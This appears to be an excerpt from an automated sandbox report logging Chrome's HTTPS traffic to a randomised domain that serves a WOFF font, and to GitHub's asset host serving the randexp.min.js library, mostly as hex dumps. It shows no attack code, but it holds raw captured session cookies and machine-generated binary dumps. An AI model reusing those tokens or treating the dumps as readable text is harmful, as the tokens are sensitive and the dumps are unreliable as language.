                                                          2024-08-27 22:11:08 UTC1369INData Raw: 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80 17 a1 24 df 05 b6 03
                                                          Data Ascii: T;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.449812188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC1450OUTGET /45lL7KipMN4YrD89WlFkKCVxy70 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://kpl2.r04ar2.com
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: font
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:08 UTC623INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Content-Type: font/woff
                                                          Content-Length: 36696
                                                          Connection: close
                                                          Content-Disposition: inline; filename="45lL7KipMN4YrD89WlFkKCVxy70"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gtIGXe6PRzfcpacHEhCGv5A4RZBpPKNY%2BrjGjVL5Tce3he7nJwh33ze%2BQ6mSEbQhTKmBhx6Sw9l7jO189Zb6AnPGDiN7%2BRk1yo3oHCGPj614bzXCv%2Bs123dDGLHlsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65459e5b7cff-EWR
                                                          2024-08-27 22:11:08 UTC746INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                          Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                          2024-08-27 22:11:08 UTC1369INData Raw: ee a5 9f 20 67 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7 28 a8 c6
                                                          Data Ascii: g*Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj(
                                                          2024-08-27 22:11:08 UTC1369INData Raw: be a8 a9 00 2d 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae e7 1a 5c
                                                          Data Ascii: -:Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f\
                                                          2024-08-27 22:11:08 UTC1369INData Raw: c7 f0 4d 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5 9d 99 42
                                                          Data Ascii: MVd>#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSuB
                                                          2024-08-27 22:11:08 UTC1369INData Raw: a2 ac 89 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6 77 95 44
                                                          Data Ascii: m{1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#wD
                                                          2024-08-27 22:11:08 UTC158INData Raw: 03 a3 a5 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3
                                                          Data Ascii: xp\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(P
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce 36 d7 f9 22 1f bd 21 0d 7d c1 ff 5b 21 31 c3 f4 aa 29 de cb 17 3f 99 27 65 b2 20 35 f7 ca fa f3 70 a4 a0 d8 4e c2 9b fa dd 80 0b 24 75 fa db 85 54 17 34 5e f1 e1 5c 03 67 43 52 7b 23 d9 40 e6 da e9 c1 d9 6e 3f c8 ac b2 e7 b7 02 41 93 9f e9 42 5f 81 ac 36 a0 9b 81 6c 17 fa 18 b8 f7 1b d3 52 1d af 7d 17 f2 df 55 92 8e df d2 a1 2b 3a 0d 80 bd bd 0d f6 ea 42 e8 71 9a c4 50 1a 6e 81 ee dd 20 b1 d2 95 f0 23 da 8a 6b db 7e 07 74 e6 12 e8 d9 65 b0 b3 df 81 e6 5e 0c ed ec 07 2b ad 7d 84
                                                          Data Ascii: Hsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g6"!}[!1)?'e 5pN$uT4^\gCR{#@n?AB_6lR}U+:BqPn #k~te^+}
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a
                                                          Data Ascii: Wyj/_uU`R.MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}Z
                                                          2024-08-27 22:11:08 UTC1369INData Raw: a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4 3a 35 4a cd 10 7f 79 1f bd b8 e4 ec ca bc 85 0b fa b6 e6 f7 3d ba 5c 08 47 bf 4b ab b1 e8 ef 19 12 fe 8c a6 ef 3b ba 6f a3 f0 20 3f 94 54 bf b3 ba f5 f4 14 c3 73 eb 17 1d 6b cf 64 63 c2 72 16 64 76 f5 0b e9 d6 55 db b7 f6 ee 11 08 27 fb 46 6f f3 d5 fc 71 46 c7 a4 58 12 c3 c3 3c 3d 38 16 c8 66 30 46 f5 40 a2 7f 19 a1 bb 9e 03 fe 68 99 72 c4 84 04 f9 78 bb b9 30 3a a4 e3 95 be f1 7c 64 4c 0c d0 e5 93 91 61 4a e5 b4 ca 98 18 7d a4 27 d0 1d 86 4d a9 19 66 ad 02 4a 3a f1 af 4b b5 b5
                                                          Data Ascii: 2?5gP0S-.~SFegqBah}XLxLH&741BRB:b:5Jy=\GK;o ?TskdcrdvU'FoqFX<=8f0F@hrx0:|dLaJ}'MfJ:K
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7 b6 f6 f6 0e 0a be 54 a6 67 8d de e6 02 a9 8e 86 f9 36 28 50 c1 73 88 05 cd c1 b2 b8 1e 18 ed 2f aa 0f 79 be 0d 0b d1 fa 81 02 01 15 cb 3b 28 90 b4 98 a8 98 f4 b4 3c d0 ae fe a2 b2 55 f8 f9 fa 73 d4 5e c0 65 2d 57 b6 d7 f8 3d 10 fa dc de e1 63 9f 08 5f 7e 32 b5 eb 68 f5 a1 77 f2 0f 27 ee 68 e8 1a f8 04 b9 7f 52 b0 ee 11 75 46 cb e1 85 09 07 0e 6f 6c de bf 75 f9 85 1b a5 db 17 99 07 06 32 ab e7 f7 2c 18 58 bd ec ea 8b 73 f7 b6 66 51 7a e3 81 87 87 a9 dd 14 6c 09 20 8c a2 73 ae 27
                                                          Data Ascii: Kv6[MMoN=WR`Q0X}_gp"zXUTg6(Ps/y;(<Us^e-W=c_~2hw'hRuFolu2,XsfQzl s'


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.449814185.199.110.1334431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:08 UTC1035OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T221107Z&X-Amz-Expires=300&X-Amz-Signature=af9a21034bb5e7fe65ef996d782a724b97119aa5e47467ec39a4e165ad0b1acb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                          Host: objects.githubusercontent.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:08 UTC848INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 10245
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                          ETag: "0x8D9B9A009499A1E"
                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                          x-ms-request-id: c04d24d1-701e-006d-40c9-dd551e000000
                                                          x-ms-version: 2020-10-02
                                                          x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                          x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                          x-ms-lease-status: unlocked
                                                          x-ms-lease-state: available
                                                          x-ms-blob-type: BlockBlob
                                                          Content-Disposition: attachment; filename=randexp.min.js
                                                          x-ms-server-encrypted: true
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Fastly-Restarts: 1
                                                          Accept-Ranges: bytes
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Age: 4106
                                                          X-Served-By: cache-iad-kiad7000071-IAD, cache-ewr-kewr1740033-EWR
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 3138, 2
                                                          X-Timer: S1724796668.361949,VS0,VE0
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                          Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                          Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                          Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                          Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                          2024-08-27 22:11:08 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
